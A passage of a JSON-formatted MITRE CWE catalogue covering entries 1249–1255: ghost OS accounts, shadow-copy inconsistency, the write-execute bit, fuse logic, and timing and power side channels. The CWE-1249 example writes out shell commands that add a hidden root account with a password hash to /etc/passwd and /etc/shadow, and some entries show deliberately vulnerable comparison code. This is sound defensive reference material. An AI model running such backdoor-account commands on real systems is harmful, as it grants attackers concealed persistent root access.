When the management tool does not accurately represent what is in the OS - such as user accounts - then the administrator might not see suspicious activities that would be noticed otherwise.","For example, numerous systems utilize a web\\n\\t\\t\\t\\tfront-end for administrative control. They also offer\\n\\t\\t\\t\\tthe ability to add, alter, and drop users with various\\n\\t\\t\\t\\tprivileges as it relates to the functionality of the\\n\\t\\t\\t\\tsystem.  A potential architectural weakness may exist\\n\\t\\t\\t\\twhere the user information reflected in the web\\n\\t\\t\\t\\tinterface does not mirror the users in the underlying\\n\\t\\t\\t\\toperating system.  Many web UI or REST APIs use the\\n\\t\\t\\t\\tunderlying operating system for authentication; the\\n\\t\\t\\t\\tsystem\'s logic may also track an additional set of\\n\\t\\t\\t\\tuser capabilities within configuration files\\n\\t\\t\\t\\tand datasets for authorization capabilities. When\\n\\t\\t\\t\\tthere is a discrepancy between the user information in\\n\\t\\t\\t\\tthe UI or REST API\'s interface system and the\\n\\t\\t\\t\\tunderlying operating system\'s user listing, this may\\n\\t\\t\\t\\tintroduce a weakness into the system.  For example, if an\\n\\t\\t\\t\\tattacker compromises the OS and adds a new user\\n\\t\\t\\t\\taccount - a \\"ghost\\" account - then the attacker could escape detection if\\n\\t\\t\\t\\tthe management tool does not list the newly-added\\n\\t\\t\\t\\taccount.","This discrepancy could be exploited in several ways:","Many of these attacker scenarios can be\\n\\t\\t\\t\\trealized by leveraging separate vulnerabilities\\n\\t\\t\\t\\trelated to XSS, command injection, authentication\\n\\t\\t\\t\\tbypass, or logic flaws on the various systems."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["A rogue admin could insert a new account into a system that will\\npersist if they are terminated or wish to take action on a system that\\ncannot be directly associated with them.","An attacker can leverage a separate command injection attack available through the web interface to insert a ghost account with shell privileges such as ssh.","An attacker can leverage existing web interface APIs, manipulated in such a way that a new user is inserted into the operating system, and the user web account is either partially created or not at all.","An attacker could create an admin\\n\\t\\t\\t\\t\\t  account which is viewable by an administrator,\\n\\t\\t\\t\\t\\t  use this account to create the ghost account,\\n\\t\\t\\t\\t\\t  delete logs and delete the first created admin\\n\\t\\t\\t\\t\\t  account."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1250","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Ghost in the Shell"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The design might assume that the underlying OS does not change."},{"Phase":"Implementation","Note":"Assumptions about the underlying OS might be hard-coded into the application or otherwise in external data stores in a way that is not updated when the OS\'s state changes."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Varies by Context"},{"Scope":"Accountability","Impact":"Hide Activities"},{"Scope":"Other","Impact":"Unexpected State"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Ensure that the admin tool refreshes its model of the underlying OS on a regular basis, and note any inconsistencies with configuration files or other data sources that are expected to have the same data."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose that an attacker successfully gains root privileges on a Linux system and adds a new \'user2\' account:","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:div":["echo \\"user2:x:0:0::/root:/\\" &gt;&gt; /etc/passwd;","echo\\n\\t\\t\\t\\t\\t  \\"user2:\\\\$6\\\\$IdvyrM6VJnG8Su5U\\\\$1gmW3Nm.IO4vxTQDQ1C8urm72JCadOHZQwqiH/nRtL8dPY80xS4Ovsv5bPCMWnXKKWwmsocSWXupUf17LB3oS.:17256:0:99999:7:::\\" &gt;&gt; /etc/shadow;"]},"Body_Text":["This new user2 account would not be noticed on the web interface, if the interface does not refresh its data of available users.","It could be argued that for this specific example, an attacker with root privileges would be likely to compromise the admin tool or otherwise feed it with false data.  However, this example shows how the discrepancy in critical data can help attackers to escape detection."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1070"}}},"Content_History":{"Submission":{"Submission_Name":"Tony Martin","Submission_Date":"2019-06-06"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}}},"1250":{"attr":{"@_ID":"1250","@_Name":"Improper Preservation of Consistency Between Independent Representations of Shared State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other.","Extended_Description":{"xhtml:p":["In highly distributed environments, or on systems with distinct physical components that operate independently, there is often a need for each component to store and update its own local copy of key data such as state or cache, so that all components have the same \\"view\\" of the overall system and operate in a coordinated fashion.  For example, users of a social media service or a massively multiplayer online game might be using their own personal computers while also interacting with different physical hosts in a globally distributed service, but all participants must be able to have the same \\"view\\" of the world.  Alternately, a processor\'s Memory Management Unit (MMU) might have \\"shadow\\" MMUs to distribute its workload, and all shadow MMUs are expected to have the same accessible ranges of memory.","In such environments, it becomes critical for\\n\\t\\tthe product to ensure that this \\"shared state\\" is\\n\\t\\tconsistently modified across all distributed systems.\\n\\t\\tIf state is not consistently maintained across all\\n\\t\\tsystems, then critical transactions might take place\\n\\t\\tout of order, or some users might not get the same\\n\\t\\tdata as other users.  When this inconsistency affects\\n\\t\\tcorrectness of operations, it can introduce\\n\\t\\tvulnerabilities in mechanisms that depend on\\n\\t\\tconsistent state."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"Cloud Computing","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1069"}}},"Notes":{"Note":{"#text":"Issues related to state and cache - creation,\\n\\t\\tpreservation, and update - are a significant gap in\\n\\t\\tCWE that is expected to be addressed in future\\n\\t\\tversions.  It likely has relationships to concurrency\\n\\t\\tand synchronization, incorrect behavior order, and\\n\\t\\tother areas that already have some coverage in CWE,\\n\\t\\talthough the focus has typically been on independent\\n\\t\\tprocesses on the same operating system - not on\\n\\t\\tindependent systems that are all a part of a larger\\n\\t\\tsystem-of-systems.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"CWE Content Team","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms"}}},"1251":{"attr":{"@_ID":"1251","@_Name":"Mirrored Regions with Different Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s architecture mirrors regions without ensuring that their contents always stay in sync.","Extended_Description":{"xhtml:p":["Having mirrored regions with different values might result in the exposure of sensitive information or possibly system compromise.","In the interest of increased performance, one might need to duplicate a resource. A cache memory is a common example of this concept, which keeps a \\"local\\" copy of a data element in the high speed cache memory. Unfortunately, this speed improvement comes with a downside, since the product needs to ensure that the local copy always mirrors the original copy truthfully. If they get out of sync, the computational result is no longer true.","During hardware design, memory is not the only item which gets mirrored. There are many other entities that get mirrored, as well: registers, memory regions, and, in some cases, even whole computational units. For example, within a multi-core processor, if all memory accesses for each and every core goes through a single Memory-Management Unit (MMU) then the MMU will become a performance bottleneck. In such cases, duplicating local MMUs that will serve only a subset of the cores rather than all of them may resolve the performance issue. These local copies are also called \\"shadow copies\\" or \\"mirrored copies.\\"","If the original resource never changed, local duplicate copies getting out of sync would never be an issue. However, the values of the original copy will sometimes change. When the original copy changes, the mirrored copies must also change, and change fast.","This situation of shadow-copy-possibly-out-of-sync-with-original-copy might occur as a result of multiple scenarios, including the following:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["After the values in the original copy change, due to some reason the original copy does not send the \\"update\\" request to its shadow copies.","After the values in the original copy change, the original copy dutifully sends the \\"update\\" request to its shadow copies, but due to some reason the shadow copy does not \\"execute\\" this update request.","After the values in the original copy change, the original copy sends the \\"update\\" request to its shadow copies, and the shadow copy executes this update request faithfully. However, during the small time period when the original copy has \\"new\\" values and the shadow copy is still holding the \\"old\\" values, an attacker can exploit the old values. Then it becomes a race condition between the attacker and the update process of who can reach the target, shadow copy first, and, if the attacker reaches first, the attacker wins.","The attacker might send a \\"spoofed\\" update request to the target shadow copy, pretending that this update request is coming from the original copy. This spoofed request might cause the targeted shadow copy to update its values to some attacker-friendly values, while the original copies remain unchanged by the attacker.","Suppose a situation where the original copy has a system of reverting back to its original value if it does not hear back from all the shadow copies that such copies have successfully completed the update request. In such a case, an attack might occur as follows: (1) the original copy might send an update request; (2) the shadow copy updates it; (3) the shadow copy sends back the successful completion message; (4) through a separate issue, the attacker is able to intercept the shadow copy\'s completion message. In this case, the original copy thinks that the update did not succeed, hence it reverts to its original value. Now there is a situation where the original copy has the \\"old\\" value, and the shadow copy has the \\"new\\" value."]}}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1250","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Whenever there are multiple, physically different copies of the same value that might change and the process to update them is not instantaneous and atomic, it is impossible to assert that the original and shadow copies will always be in sync - there will always be a time period when they are out of sync. To mitigate the consequential risk, the recommendations essentially are:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Make this out-of-sync time period as small as possible, and","Make the update process as robust as possible."]}}}},"Effectiveness":"Moderate"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}},"Notes":{"Note":{"#text":"Issues related to state and cache - creation, preservation, and update - are a significant gap in CWE that is expected to be addressed in future versions. It has relationships to concurrency and synchronization, incorrect behavior order, and other areas that already have some coverage in CWE, although the focus has typically been on independent processes on the same operating system - not on independent systems that are all a part of a larger system-of-systems.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1252":{"attr":{"@_ID":"1252","@_Name":"CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory.","Extended_Description":{"xhtml:p":"CPUs provide a special bit that supports exclusivity of write and execute operations. This bit is used to segregate areas of memory to either mark them as code (instructions, which can be executed) or data (which should not be executed). In this way, if a user can write to a region of memory, the user cannot execute from that region and vice versa. This exclusivity provided by special hardware bit is leveraged by the operating system to protect executable space. While this bit is available in most modern processors by default, in some CPUs the exclusivity is implemented via a memory-protection unit (MPU) and memory-management unit (MMU) in which memory regions can be carved out with exact read, write, and execute permissions. However, if the CPU does not have an MMU/MPU, then there is no write exclusivity. Without configuring exclusivity of operations via segregated areas of memory, an attacker may be able to inject malicious code onto memory and later execute it."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Implement a dedicated bit that can be leveraged by the Operating System to mark data areas as non-executable. If such a bit is not available in the CPU, implement MMU/MPU (memory management unit / memory protection unit)."}},{"Phase":"Integration","Description":{"xhtml:p":"If MMU/MPU are not available, then the firewalls need to be implemented in the SoC interconnect to mimic the write-exclusivity operation."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"MCS51 Microcontroller (based on 8051) does not have a special bit to support write exclusivity. It also does not have an MMU/MPU support. The Cortex-M CPU has an optional MPU that supports up to 8 regions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"The optional MPU is not configured."},"Body_Text":"If the MPU is not configured, then an attacker will be able to inject malicious data into memory and execute it."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1076"}},{"attr":{"@_External_Reference_ID":"REF-1077"}},{"attr":{"@_External_Reference_ID":"REF-1078"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1253":{"attr":{"@_ID":"1253","@_Name":"Incorrect Selection of Fuse Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse.","Extended_Description":{"xhtml:p":"Fuses are often used to store secret data, including security configuration data. When not blown, a fuse is considered to store a logic 0, and, when blown, it indicates a logic 1. Fuses are generally considered to be one-directional, i.e., once blown to logic 1, it cannot be reset to logic 0. However, if the logic used to determine system-security state (by leveraging the values sensed from the fuses) uses negative logic, an attacker might blow the fuse and drive the system to an insecure state."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"},{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"]}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Logic should be designed in a way that blown fuses do not put the product into an insecure state that can be leveraged by an attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["A chip implements a secure boot and uses the sensed value of a fuse \\n         \\"do_secure_boot\\" to determine whether to perform a secure boot or not. If this fuse \\n         value is \\"0\\", the system performs secure boot. Otherwise, it does not perform secure \\n         boot.","An attacker blows the \\"do_secure_boot\\" fuse to \\"1\\". After reset, the attacker loads a custom \\n         bootloader, and, since the fuse value is now \\"1\\", the system does not perform secure boot, \\n         and the attacker can execute their custom firmware image.","Since by default, a fuse-configuration value is a \\"0\\", an attacker can blow it to a \\"1\\" with \\n         inexpensive hardware.","If the logic is reversed, an attacker cannot easily reset the fuse. Note that, with \\n         specialized and expensive equipment, an attacker with full physical access might be able to \\"unblow\\" the fuse \\n         value to a \\"0\\"."]}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1080"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1254":{"attr":{"@_ID":"1254","@_Name":"Incorrect Comparison Logic Granularity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes.","Extended_Description":{"xhtml:p":"Comparison logic is used to compare a variety of objects including passwords, Message \\n         Authentication Codes (MACs), and responses to verification challenges. When comparison logic is \\n         implemented at a finer granularity (e.g., byte-by-byte comparison) and breaks in the case of a \\n         comparison failure, an attacker can exploit this implementation to identify when exactly \\n         the failure occurred. With multiple attempts, the attacker may be able to guesses the correct \\n         password/response to challenge and elevate their privileges."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"208","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Authorization"],"Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"xhtml:p":"The hardware designer should ensure that comparison logic is implemented so as to compare in one operation instead in smaller chunks."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider an example hardware module that checks a user-provided password to grant access to a user. The user-provided password is compared against a golden value in a byte-by-byte manner.","Example_Code":[{"#text":"always_comb @ (posedge clk)beginassign check_pass[3:0] = 4\u2019b0;for (i = 0; i &lt; 4; i++) beginif (entered_pass[(i*8 \u2013 1) : i] eq golden_pass([i*8 -1) : i])assign check_pass[i] = 1;continue;elseassign check_pass[i] = 0;break;endassign grant_access = (check_pass == 4\u2019b1111) ? 1\u2019b1: 1\u2019b0;end","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"","xhtml:br":["","","","","","","","","","","",""]},{"#text":"Either the comparison of the entire string should be done all at once or the attacker is not given an indication whether pass or fail happened by allowing the comparison to run through all bits before the grant_access signal is set.always_comb @ (posedge clk)beginassign check_pass[3:0] = 4\u2019b0;for (i = 0; i &lt; 4; i++) beginif (entered_pass[(i*8 \u2013 1) : i] eq golden_pass([i*8 -1) : i])assign check_pass[i] = 1;continue;elseassign check_pass[i] = 0;continue;endassign grant_access = (check_pass == 4\u2019b1111) ? 1\u2019b1: 1\u2019b0;end","attr":{"@_Nature":"informative"},"xhtml:br":["","","","","","","","","","","","","","","",""]}],"Body_Text":"Since the code breaks on an incorrect entry of password, an attacker can guess the correct password for that byte-check iteration with few repeat attempts."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-0984","Description":"The passwordCheck function in SAP Router 721 patch 117, 720 patch 411, 710 patch 029, and earlier terminates validation of a Route Permission Table entry password upon encountering the first incorrect character, which allows remote attackers to obtain passwords via a brute-force attack that relies on timing differences in responses to incorrect password guesses, aka a timing side-channel attack.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0984"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1079"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1255":{"attr":{"@_ID":"1255","@_Name":"Comparison Logic is Vulnerable to Power Side-Channel Attacks","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A device\'s real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token.","Extended_Description":{"xhtml:p":"The power consumed by a device may be instrumented and monitored in real time. If the algorithm for evaluating security tokens is not sufficiently robust, the power consumption may vary by token entry comparison against the reference value. Further, if retries are unlimited, the power difference between a \\"good\\" entry and a \\"bad\\" entry may be observed and used to determine whether each entry itself is correct thereby allowing unauthorized parties to calculate the reference value."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1300","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1259","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The design of the algorithm itself may intrinsically allow the power side channel attack to be effective"},{"Phase":"Implementation","Note":"This weakness may be introduced during implementation despite a robust design that otherwise prevents exploitation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Modify Memory","Read Memory","Read Files or Directories","Modify Files or Directories","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data","Hide Activities"],"Note":"As compromising a security token may result in complete system control, the impacts are relatively universal"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The design phase must consider each check of a security token against a standard and the amount of power consumed during the check of a good token versus a bad token. The alternative is an all at once check where a retry counter is incremented PRIOR to the check."},{"Phase":"Architecture and Design","Description":"Another potential mitigation is to parallelize shifting of secret data (see example 2 below). Note that the wider the bus the more effective the result."},{"Phase":"Architecture and Design","Description":"An additional potential mitigation is to add random data to each crypto operation then subtract it out afterwards. This is highly effective but costly in performance, area, and power consumption. It also requires a random number generator."},{"Phase":"Implementation","Description":"If the architecture is unable to prevent the attack, using filtering components may reduce the ability to implement an attack, however, consideration must be given to the physical removal of the filter elements."},{"Phase":"Integration","Description":"During integration, avoid use of a single secret for an extended period (e.g. frequent key updates). This limits the amount of data compromised but at the cost of complexity of use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider an example hardware module that checks a user-provided password (or PIN) to grant access to a user. The user-provided password is compared against a stored value byte-by-byte.","Example_Code":[{"#text":"static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_ok = 0;for (i = 0; i &lt; NUM_PW_DIGITS; i++)if (GetPasswordByte() == stored_password([i])password_ok |= 1; // Power consumption is different hereelsepassword_ok |= 0; // than from hereendif (password_ok &gt; 0)password_tries = NUM_RETRIES;break_to_Ok_to_proceedpassword_tries--;while (true)// Password OK","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","","","",""]},{"#text":"Among various options for mitigating the string comparison is obscuring the power comsumption by having opposing bit flips during bit operations. Note that in this example, the initial change of the bit values could still provide power indication depending upon the hardware itself. This possibility needs to be measured for verification.static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_tries--;  // Put retry code here to catch partial retriespassword_ok = 0;for (i = 0; i &lt; NUM_PW_DIGITS; i++)if (GetPasswordByte() == stored_password([i])password_ok |= 0x10; // Power consumption hereelsepassword_ok |= 0x01; // is now the same hereendif ((password_ok &amp; 1) == 0)password_tries = NUM_RETRIES;break_to_Ok_to_proceedwhile (true)// Password OK","attr":{"@_Nature":"good"},"xhtml:br":["","","","","","","","","","","","","","","","","",""]},{"#text":"An alternative to the previous example is simply comparing the whole password simultaneously.static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_tries--;  // Put retry code here to catch partial retriesfor (i = 0; i &lt; NUM_PW_DIGITS; i++)stored_password([i] = GetPasswordByte();endif (stored_password == saved_password)password_tries = NUM_RETRIES;break_to_Ok_to_proceedwhile (true)// Password OK","attr":{"@_Nature":"good"},"xhtml:br":["","","","","","","","","","","","","",""]}],"Body_Text":["Since the algorithm uses a different number of 1\'s and 0\'s for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes.","Since the algorithm uses a different number of 1\'s and 0\'s for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes.","Since comparison is done atomically, there is no indication which bytes fail forcing the attacker to brute force the whole password at once. Note that other mitigations may exist such as masking - causing a large current draw to mask individual bit flips."]},{"Intro_Text":"This code demonstrates the transfer of a secret key using Serial-In/Serial-Out shift. It\'s easy to extract the secret using simple power analysis as each shift gives data on a single bit of the key.","Example_Code":[{"#text":"module siso(clk,rst,a,q);input a;input clk,rst;output q;reg q;always@(posedge clk,posedge rst)beginif(rst==1\'b1)q&lt;1\'b0;elseq&lt;a;endendmodule","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","",""]},{"#text":"module pipo(clk,rst,a,q);input clk,rst;input[3:0]a;output[3:0]q;reg[3:0]q;always@(posedge clk,posedge rst)beginif 